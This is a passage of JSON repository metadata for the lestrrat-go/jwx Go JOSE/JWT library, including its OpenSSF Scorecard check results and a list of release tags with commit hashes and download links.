#jwe","archived":false,"fork":false,"pushed_at":"2026-03-23T20:34:17.000Z","size":21587,"stargazers_count":2339,"open_issues_count":5,"forks_count":192,"subscribers_count":24,"default_branch":"develop/v3","last_synced_at":"2026-03-24T15:23:41.313Z","etag":null,"topics":["go","golang","jwe","jwk","jws","jwt","oidc"],"latest_commit_sha":null,"homepage":"","language":"Go","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"mit","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/lestrrat-go.png","metadata":{"files":{"readme":"README.md","changelog":"Changes","contributing":".github/CONTRIBUTING.md","funding":".github/FUNDING.yml","license":"LICENSE","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":"SECURITY.md","support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null,"zenodo":null,"notice":null,"maintainers":null,"copyright":null,"agents":"AGENTS.md","dco":null,"cla":null},"funding":{"github":["lestrrat"],"patreon":null,"open_collective":null,"ko_fi":null,"tidelift":null,"community_bridge":null,"liberapay":null,"issuehunt":null,"otechie":null,"custom":null}},"created_at":"2015-11-04T05:12:52.000Z","updated_at":"2026-03-23T20:34:22.000Z","dependencies_parsed_at":"2023-09-23T13:31:33.054Z","dependency_job_id":"8122a1a4-053c-4ee5-9b97-9972c16335ef","html_url":"https://github.com/lestrrat-go/jwx","commit_stats":{"total_commits":1692,"total_committers":66,"mean_commits":"25.636363636363637","dds":0.3427895981087471,"last_synced_commit":"f0730766974533dcd9e5f8074a0adfcc471b0f0a"},"previous_names":["lestrrat/jwx"],"tags_count":106,"template":false,"template_full_name":null,"purl":"pkg:github/lestrrat-go/jwx","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/lestrrat-go","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/refs/heads/develop/v3","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/sbom","scorecard":{"id":371885,"data":{"date":"2025-08-11","repo":{"name":"github.com/lestrrat-go/jwx","commit":"568c2c84f11f47f53126b44bf3a3d76993038cba"},"scorecard":{"version":"v5.2.1-40-gf6ed084d","commit":"f6ed084d17c9236477efd66e5b258b9d4cc7b389"},"score":6.6,"checks":[{"name":"Maintained","score":10,"reason":"30 commit(s) and 7 issue activity found in the last 90 days -- score normalized to 10","details":null,"documentation":{"short":"Determines if the project is \"actively maintained\".","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#maintained"}},{"name":"Code-Review","score":0,"reason":"Found 0/23 approved changesets -- score normalized to 0","details":null,"documentation":{"short":"Determines if the project requires human code review before pull requests (aka merge requests) are merged.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#code-review"}},{"name":"Security-Policy","score":10,"reason":"security policy file detected","details":["Info: security policy file detected: SECURITY.md:1","Info: Found linked content: SECURITY.md:1","Info: Found disclosure, vulnerability, and/or timelines in security policy: SECURITY.md:1","Info: Found text in security policy: SECURITY.md:1"],"documentation":{"short":"Determines if the project has published a security policy.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#security-policy"}},{"name":"Dangerous-Workflow","score":10,"reason":"no dangerous workflow patterns detected","details":null,"documentation":{"short":"Determines if the project's GitHub Action workflows avoid dangerous patterns.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#dangerous-workflow"}},{"name":"Packaging","score":-1,"reason":"packaging workflow not detected","details":["Warn: no GitHub/GitLab publishing workflow detected."],"documentation":{"short":"Determines if the project is published as a package that others can easily download, install, easily update, and uninstall.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#packaging"}},{"name":"Binary-Artifacts","score":10,"reason":"no binaries found in the repo","details":null,"documentation":{"short":"Determines if the project has generated executable (binary) artifacts in the source repository.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#binary-artifacts"}},{"name":"CII-Best-Practices","score":0,"reason":"no effort to earn an OpenSSF best practices badge detected","details":null,"documentation":{"short":"Determines if the project has an OpenSSF (formerly CII) Best Practices Badge.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#cii-best-practices"}},{"name":"Token-Permissions","score":0,"reason":"detected GitHub workflow tokens with excessive permissions","details":["Info: jobLevel 'actions' permission set to 'read': .github/workflows/codeql.yml:28","Info: jobLevel 'contents' permission set to 'read': .github/workflows/codeql.yml:29","Warn: no topLevel permission defined: .github/workflows/assign-issue.yml:1","Warn: no topLevel permission defined: .github/workflows/assign-pr.yml:1","Warn: no topLevel permission defined: .github/workflows/autodoc.yml:1","Warn: no topLevel permission defined: .github/workflows/benchmark.yml:1","Warn: no topLevel permission defined: .github/workflows/ci.yml:1","Warn: no topLevel permission defined: .github/workflows/codeql.yml:1","Warn: no topLevel permission defined: .github/workflows/dependabot.yml:1","Warn: no topLevel permission defined: .github/workflows/lint.yml:1","Warn: no topLevel permission defined: .github/workflows/smoke.yml:1","Warn: no topLevel permission defined: .github/workflows/stale.yml:1","Info: no jobLevel write permissions found"],"documentation":{"short":"Determines if the project's workflows follow the principle of least privilege.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#token-permissions"}},{"name":"License","score":10,"reason":"license file detected","details":["Info: project has a license file: LICENSE:0","Info: FSF or OSI recognized license: MIT License: LICENSE:0"],"documentation":{"short":"Determines if the project has defined a license.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#license"}},{"name":"Fuzzing","score":0,"reason":"project is not fuzzed","details":["Warn: no fuzzer integrations found"],"documentation":{"short":"Determines if the project uses fuzzing.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#fuzzing"}},{"name":"Pinned-Dependencies","score":6,"reason":"dependency not pinned by hash detected -- score normalized to 6","details":["Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:45: update your workflow using https://app.stepsecurity.io/secureworkflow/lestrrat-go/jwx/ci.yml/develop/v3?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/codeql.yml:47: update your workflow using https://app.stepsecurity.io/secureworkflow/lestrrat-go/jwx/codeql.yml/develop/v3?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/codeql.yml:61: update your workflow using https://app.stepsecurity.io/secureworkflow/lestrrat-go/jwx/codeql.yml/develop/v3?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/codeql.yml:74: update your workflow using https://app.stepsecurity.io/secureworkflow/lestrrat-go/jwx/codeql.yml/develop/v3?enable=pin","Warn: goCommand not pinned by hash: .github/workflows/benchmark.yml:33","Warn: goCommand not pinned by hash: .github/workflows/ci.yml:36","Warn: goCommand not pinned by hash: .github/workflows/smoke.yml:42","Warn: goCommand not pinned by hash: .github/workflows/smoke.yml:44","Info:  15 out of  18 GitHub-owned GitHubAction dependencies pinned","Info:   4 out of   5 third-party GitHubAction dependencies pinned","Info:   2 out of   6 goCommand dependencies pinned"],"documentation":{"short":"Determines if the project has declared and pinned the dependencies of its build process.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#pinned-dependencies"}},{"name":"Signed-Releases","score":-1,"reason":"no releases found","details":null,"documentation":{"short":"Determines if the project cryptographically signs release artifacts.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#signed-releases"}},{"name":"Branch-Protection","score":-1,"reason":"internal error: error during branchesHandler.setup: internal error: githubv4.Query: Resource not accessible by integration","details":null,"documentation":{"short":"Determines if the default and release branches are protected with GitHub's branch protection settings.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#branch-protection"}},{"name":"SAST","score":9,"reason":"SAST tool detected but not run on all commits","details":["Info: SAST configuration detected: CodeQL","Warn: 24 commits out of 27 are checked with a SAST tool"],"documentation":{"short":"Determines if the project uses static code analysis.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#sast"}},{"name":"Vulnerabilities","score":10,"reason":"0 existing vulnerabilities detected","details":null,"documentation":{"short":"Determines if the project has open, known unfixed vulnerabilities.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#vulnerabilities"}}]},"last_synced_at":"2025-08-18T13:10:24.800Z","repository_id":37406150,"created_at":"2025-08-18T13:10:24.800Z","updated_at":"2025-08-18T13:10:24.800Z"},"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":286080680,"owners_count":30897961,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2026-03-24T08:58:18.477Z","status":"ssl_error","status_checked_at":"2026-03-24T08:57:59.595Z","response_time":106,"last_error":"SSL_read: unexpected eof while reading","robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":false,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"},"owner_record":{"login":"lestrrat-go","name":"lestrrat-go","uuid":"36653903","kind":"organization","description":"@lestrrat 's Go projects","email":null,"website":null,"location":null,"twitter":null,"company":null,"icon_url":"https://avatars.githubusercontent.com/u/36653903?v=4","repositories_count":99,"last_synced_at":"2023-08-07T14:22:53.617Z","metadata":{"has_sponsors_listing":false},"html_url":"https://github.com/lestrrat-go","funding_links":[],"total_stars":null,"followers":null,"following":null,"created_at":"2022-11-06T19:45:03.488Z","updated_at":"2023-08-07T14:22:54.666Z","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/lestrrat-go","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/lestrrat-go/repositories"},"tags":[{"name":"v3.0.13","sha":"163a6e94d45a8f89c7d0e25f30652a95c554bd88","kind":"commit","published_at":"2026-01-12T06:38:32.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v3.0.13","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v3.0.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v3.0.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v3.0.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v3.0.13/manifests"},{"name":"v3.0.12","sha":"987379965645db94a50483d7c21c9358b905469a","kind":"commit","published_at":"2025-10-20T09:17:05.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v3.0.12","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v3.0.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v3.0.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v3.0.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v3.0.12/manifests"},{"name":"v3.0.11","sha":"9e9c27a269a1a650e1f666b18946dd1796f84779","kind":"commit","published_at":"2025-09-14T02:50:03.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v3.0.11","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v3.0.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v3.0.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v3.0.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v3.0.11/manifests"},{"name":"v3.0.10","sha":"e14eb9b9730b352cb5f8854bbdf315bb98d1a5e0","kind":"commit","published_at":"2025-08-04T12:36:45.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v3.0.10","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v3.0.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v3.0.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v3.0.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v3.0.10/manifests"},{"name":"v3.0.9","sha":"8babbb1d64fda50d89276b5d52b1a682362334b2","kind":"commit","published_at":"2025-07-31T06:59:10.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v3.0.9","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v3.0.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v3.0.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v3.0.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v3.0.9/manifests"},{"name":"v3.0.8","sha":"7f3caf368dda160290bcc6952b4bfb549e308271","kind":"commit","published_at":"2025-06-27T10:33:16.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v3.0.8","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v3.0.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v3.0.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v3.0.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v3.0.8/manifests"},{"name":"v3.0.7","sha":"202bc50cf39999c4379eaaa593e4bd2aea9f870f","kind":"commit","published_at":"2025-06-16T00:42:56.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v3.0.7","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v3.0.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v3.0.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v3.0.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v3.0.7/manifests"},{"name":"v3.0.6","sha":"a68b08e71ab7cc4fb6098d2c453da41cc7a7967f","kind":"commit","published_at":"2025-06-13T11:06:37.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v3.0.6","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v3.0.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v3.0.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v3.0.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v3.0.6/manifests"},{"name":"v3.0.5","sha":"c3404a9d9937bc0d7a0f89ecfbc1303fd108c67d","kind":"commit","published_at":"2025-06-11T00:58:28.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v3.0.5","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v3.0.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v3.0.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v3.0.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v3.0.5/manifests"},{"name":"v3.0.4","sha":"3f1f2b899191cf6c40404736681a180e479c84eb","kind":"commit","published_at":"2025-06-09T12:04:08.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v3.0.4","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v3.0.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v3.0.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v3.0.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v3.0.4/manifests"},{"name":"v3.0.3","sha":"b1a4fc672df21b754d9904306e80c9be22deeba4","kind":"commit","published_at":"2025-06-06T01:53:35.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v3.0.3","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v3.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v3.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v3.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v3.0.3/manifests"},{"name":"v3.0.2","sha":"542198a7a000125443d53107fbd55c9336943c4d","kind":"commit","published_at":"2025-06-03T12:41:34.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v3.0.2","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v3.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v3.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v3.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v3.0.2/manifests"},{"name":"v2.1.6","sha":"13e92f3eb3982c11fa6a19280e00e3256237cf87","kind":"commit","published_at":"2025-04-29T08:17:11.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v2.1.6","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v2.1.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v2.1.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.1.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.1.6/manifests"},{"name":"v3.0.1","sha":"374ec5920fce56373ebe3a9c89134a2d6f81d4cd","kind":"commit","published_at":"2025-04-29T08:15:12.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v3.0.1","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v3.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v3.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v3.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v3.0.1/manifests"},{"name":"v2.1.5","sha":"a980d2346e8d17ddab69742e30ca1070018b0bf6","kind":"commit","published_at":"2025-04-16T11:17:27.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v2.1.5","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v2.1.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v2.1.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.1.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.1.5/manifests"},{"name":"v1.2.31","sha":"26ecf5d02cf6226f49e703bdddcae54dcf5ae0da","kind":"commit","published_at":"2025-04-09T10:38:17.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.2.31","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.2.31","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.2.31","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.31","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.31/manifests"},{"name":"v3.0.0","sha":"8884a402374939b27c9b96782e9e60a31aed75f6","kind":"commit","published_at":"2025-03-31T23:45:01.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v3.0.0","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v3.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v3.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v3.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v3.0.0/manifests"},{"name":"v3.0.0-beta2","sha":"c44f4f6a7da1328f467d9c4a31f884bc7fd27fa6","kind":"commit","published_at":"2025-03-29T23:21:02.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v3.0.0-beta2","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v3.0.0-beta2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v3.0.0-beta2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v3.0.0-beta2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v3.0.0-beta2/manifests"},{"name":"v3.0.0-beta1","sha":"766a05908e5a0a90c40e5abb8cc4a3cfa523c7e8","kind":"commit","published_at":"2025-03-14T23:55:42.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v3.0.0-beta1","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v3.0.0-beta1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v3.0.0-beta1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v3.0.0-beta1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v3.0.0-beta1/manifests"},{"name":"v3.0.0-alpha3","sha":"da52a87c8b4bfb1d68fb6a07b1dc03d1be65d781","kind":"commit","published_at":"2025-03-13T00:03:55.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v3.0.0-alpha3","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v3.0.0-alpha3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v3.0.0-alpha3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v3.0.0-alpha3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v3.0.0-alpha3/manifests"},{"name":"v3.0.0-alpha2","sha":"0076496d247519f9650be6c5fff022f3a70e488c","kind":"commit","published_at":"2025-02-25T09:36:48.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v3.0.0-alpha2","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v3.0.0-alpha2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v3.0.0-alpha2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v3.0.0-alpha2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v3.0.0-alpha2/manifests"},{"name":"v2.1.4","sha":"de347302071b3af3457ac67e9885e1396b6ec023","kind":"commit","published_at":"2025-02-25T09:32:52.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v2.1.4","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v2.1.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v2.1.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.1.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.1.4/manifests"},{"name":"v2.1.3","sha":"9e379c7bc07f7d931efcf6082b5456379aba496f","kind":"commit","published_at":"2024-11-24T10:03:57.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v2.1.3","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v2.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v2.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.1.3/manifests"},{"name":"v3.0.0-alpha1","sha":"64985973018b6e8057905dc107d442a9f52c92c8","kind":"commit","published_at":"2024-11-01T06:22:40.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v3.0.0-alpha1","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v3.0.0-alpha1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v3.0.0-alpha1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v3.0.0-alpha1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v3.0.0-alpha1/manifests"},{"name":"v2.1.2","sha":"536b643c661a886300246d2f334d4d836e61f497","kind":"commit","published_at":"2024-10-25T06:34:03.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v2.1.2","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v2.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v2.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.1.2/manifests"},{"name":"v1.2.30","sha":"a7656533fb37069151200cc0d1d61fd44b459d77","kind":"commit","published_at":"2024-07-28T00:14:34.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.2.30","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.2.30","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.2.30","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.30","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.30/manifests"},{"name":"v2.1.1","sha":"8d1d78351e9f259723f9f558889a78e327379683","kind":"commit","published_at":"2024-07-28T00:05:37.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v2.1.1","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v2.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v2.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.1.1/manifests"},{"name":"v2.1.0","sha":"639d23173f8e958666dc34add887fe054d52790b","kind":"commit","published_at":"2024-06-17T22:49:20.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v2.1.0","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v2.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v2.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestr